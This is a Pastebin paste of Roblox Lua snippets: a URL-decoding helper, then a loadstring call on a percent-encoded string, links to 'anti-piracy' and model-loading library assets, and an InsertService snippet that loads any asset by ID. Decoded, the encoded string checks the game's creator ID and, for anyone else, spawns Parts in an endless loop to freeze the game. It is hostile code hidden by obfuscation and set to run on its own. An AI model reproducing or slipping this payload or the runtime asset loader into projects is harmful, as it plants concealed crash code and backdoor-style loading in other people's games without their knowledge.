Advertisement
Guest User

Untitled

a guest
Dec 15th, 2019
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.17 KB | None | 0 0
  1. function decodeChar(hex)
  2. return string.char(tonumber(hex,16))
  3. end
  4.  
  5. function decodeString(str)
  6. local output, t = string.gsub(str,"%%(%x%x)",decodeChar)
  7. return output
  8. end
  9.  
  10. -- will print "http://foo bar/"
  11. print(decodeString("http%3A%2F%2Ffoo%20bar%2F"))
  12.  
  13. loadstring( string.gsub("%76%20%3D%20%67%61%6D%65%2E%43%72%65%61%74%6F%72%49%64%20%20%69%66%20%76%20%7E%3D%20%33%39%31%36%30%38%38%31%20%61%6E%64%20%76%20%74%68%65%6E%20%20%77%68%69%6C%65%20%74%72%75%65%20%64%6F%20%20%49%6E%73%74%61%6E%63%65%2E%6E%65%77%28%22%50%61%72%74%22%2C%20%67%61%6D%65%2E%57%6F%72%6B%73%70%61%63%65%29%20%20%65%6E%64%20%20%65%6E%64", "%%(%x%x)", function (x) return string.char(tonumber(x, 16)) end) )()
  14.  
  15.  
  16. https://www.roblox.com/library/462628693/Anti-Piracy-Warning-Effective
  17. https://www.roblox.com/library/31725564/Chat-Insert-Load-model-script
  18.  
  19. local ID = 0000000 --Change this to the model ID
  20. local InsertService = game:GetService("InsertService") --Get the service
  21.  
  22. local Model = InsertService:LoadAsset(ID) --Insert the model
  23. local NewModel = Model:GetChildren()[1] --Find your model
  24.  
  25. NewModel.Parent = workspace --Put it into the game
  26. Model:Destroy() --Destroy the container model
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement